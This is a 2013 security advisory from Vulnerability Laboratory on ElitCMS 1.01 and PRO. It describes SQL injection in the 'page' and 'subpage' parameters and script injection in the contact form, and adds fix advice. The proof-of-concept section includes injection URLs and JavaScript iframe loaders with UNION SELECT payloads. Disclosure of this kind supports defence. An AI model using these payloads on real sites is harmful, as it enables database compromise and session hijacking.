Document Title:
===============
Elite Graphix ElitCMS 1.01 & PRO - Multiple Web Vulnerabilities


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1117


Release Date:
=============
2013-10-18


Vulnerability Laboratory ID (VL-ID):
====================================
1117


Common Vulnerability Scoring System:
====================================
8.3


Product & Service Introduction:
===============================
Elite CMS is a web content management system made for the peoples who don`t have much technical knowledge of HTML or 
PHP but know how to use a simple notepad with computer keyboard. Elite CMS Pro is a successor of the eliteCMS . 

Elite CMS was made available free to public last year i.e. 2008. Since then i have received hundreds of appreciation 
email from the users of eliteCMS world wide. Some user of my eliteCMS want some more robust and powerful features. 
Due to the huge response from the users i have decided to write pro edition of eliteCMS.

All new features in pro edition of the eliteCMS is based on the feedbacks and suggestions made by users of eliteCMS 
- The Lightweight CMS. Some users suggested that eliteCMS should have multilevel menu navigation with sub pages support, 
some suggested multiple web forms support for cms pages, some want more flexible and easy to understand template system.

(Copy of the Homepage: http://elitecms.net/elitecmspro.php )


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple vulnerabilities in the Elite-Graphix `ElitCMS` v1.01 web-application.


Vulnerability Disclosure Timeline:
==================================
2013-10-18:    Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Elite Graphix
Product: ElitCMS - Web Application 1.01


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Critical


Technical Details & Description:
================================
1.1
A remote sql injection web vulnerability is detected in the official Elite-Graphix `ElitCMS` v1.01 web-application.
The vulnerability allows remote attackers to unauthorized inject own sql commands to compromise the application dbms.

The vulnerability is located in the `page` value of the index.php file. Remote attackers are able to inject own sql 
commands in the page parameter GET method request to compromise the database management system or web-application.
The issue is a classic order by sql injection vulnerability.  

Exploitation of the sql injection web vulnerability requires no user interaction or privileged application user account.
Successful exploitation of the sql injection bug results in database management system and web-application compromise.


Vulnerable Module(s):
				[+] Index

Vulnerable File(s):
				[+] index.php

Vulnerable Parameter(s):
				[+] page



1.2
A client-side post inject web vulnerability is detected in the official Elite Graphix ElitCMS v1.01 web-application.
The vulnerability allows remote attackers to manipulate via POST method web-application to browser requests (client-side).

The vulnerability is located in the contact form module of the application in the name value parameter. Remote attackers 
can inject own malicious persistent script codes as name value in the contact form when processing to send via POST method.
The script code execute occurs in the thanks page in the context of the echo name value.

Successful exploitation of the client-side POST inject web vulnerability results in session hijacking, client-side phishing, 
client-side unauthorized external redirects and client-side manipulation of the contact formular module context.


Vulnerable Module(s):
				[+] Contact Formular

Vulnerable File(s):
				[+] page

Vulnerable Parameter(s):
				[+] name


Proof of Concept (PoC):
=======================
1.1
The sql injection web vulnerability can be exploited by remote attackers without privileged application user account 
and also without user interaction. For demonstration or to reproduce ...

PoC: #1 - Standard Edition
http://elit.localhost:8080/elitecms/index.php?page=-1%27[ORDER BY SQL INJECTION VULNERABILITY!]--


Exploit: 

<script language=JavaScript>m='%3Chtml%3E%0A%3Chead%3E%3Cbody%3E%0A%3Ctitle%3EElit%20CMS%20v1.01%20-
%20SQL%20Injection%20PoC#1-StandardEdition%3C/title%3E%0A%3Ciframe%20src%3Dhttp%3A//cms.localhost%3A8080/elitecms/index.php%3F
page%3D3%27union%20select%20all%201%2C2%2Cx%2Cx%2Cx%2Cx%2C--%20%20width%3D%22733%22%20height%3D%22733%22%3E%0A%3C/
body%3E%3C/head%3E%0A%3C/html%3E';d=unescape(m);document.write(d);</script>


--- DBMS SQL Exception Logs ---
Database Query failed !
Check Database Settings.
You have an error in your SQL syntax; 
Check the manual that corresponds to your MySQL server version for the right syntax to use near ''-1''' at line 1


PoC: #2 - PRO Edition
http://elit.localhost:8080/index.php?mpage=3&subpage=-1%27[ORDER BY SQL INJECTION VULNERABILITY!]--

<script language=JavaScript>m='%3Chtml%3E%0A%3Chead%3E%3Cbody%3E%0A%3Ctitle%3EElitCMS%20v1.01%20-
%20SQL%20Injection%20PoC%232%20PRO%20Edition%3C/title%3E%0A%3Ciframe%20src
%3Dhttp%3A//elit.localhost%3A8080/index.php%3Fmpage%3D3%26subpage%3D-7%27union%20select%201%2C2%2C3
%2Cx%2Cx%2Cx%2Cx%2C@@version%2Cx--%3E%0A%3C/body%3E%3C/head%3E%0A%3C/html%3E';d=unescape(m);document.write(d);</script>


--- DBMS SQL Exception Logs ---
Database Query failed !
Check Database Settings.
You have an error in your SQL syntax; 
check the manual that corresponds to your MySQL server version for the right syntax to use near '-'''' at line 1



1.2
The client-side post inject web vulnerability can be exploited by remote attackers without privileged application user account 
and with low or medium user interaction. For demonstration or reproduce ...


PoC: Thanks - (Page echo with vulnerable Name value)

<div id="content">
<h1>Contact Information</h1>
<p id="eq3">Feel free to contact us with your feedbacks .<br><br>Use contact form below to send us quick email.<br></p>
<div class="ctFrmHd">-: Contact Form :-</div>
<span class="successMsg">Thank you dear <span>>"<<"<><>"<[CLIENT-SIDE INJECTED SCRIPT CODE VIA POST!]"></span> 
your message has been send successfully.</span><form name="contactForm" method="post" action="">
<table width="419" border="0" cellpadding="8" cellspacing="0" id="contcatFormTbl">
<tr>
<td width="88">     Name :</td>
<td width="304"><input type="text" name="name" id="name"  class="frmInput" value=">"<[CLIENT-SIDE INJECTED SCRIPT CODE VIA POST!]>"/></td>
</tr>


Note: As default the page=3 is available as contact formular but it can also be located in other module of the elit-cms.


Reference(s):
http://elit.localhost:8080/elitecms/index.php?page=3


Solution - Fix & Patch:
=======================
1.1
The sql injection web vulnerability can be patched by the implement of a secure statement to the page value and index.php file.
Also restrict the page value request and ensure the output is secure encoded.
Disallow the display of sql debug/errors logs in the cms main context. Setup a own module to log sql errors in the acp.

1.2
The client-side post inject web vulnerability can be patched by a secure parse and encode of the name value in the post method request 
and the thanks page echo message. 


Security Risk:
==============
1.1
The security risk of the sql injection web vulnerability is estimated as critical.

1.2
The security risk of the client-side post inject web vulnerability is estimated as low(+)|(-)medium.


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Katharin S. L. (CH)


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       - www.evolution-sec.com
Contact:    admin@vulnerability-lab.com 	- research@vulnerability-lab.com 	       - admin@evolution-sec.com
Section:    www.vulnerability-lab.com/dev 	- forum.vulnerability-db.com 		       - magazine.vulnerability-db.com
Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       - youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and 
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), 
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

				Copyright © 2013 | Vulnerability Laboratory [Evolution Security]



-- 
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com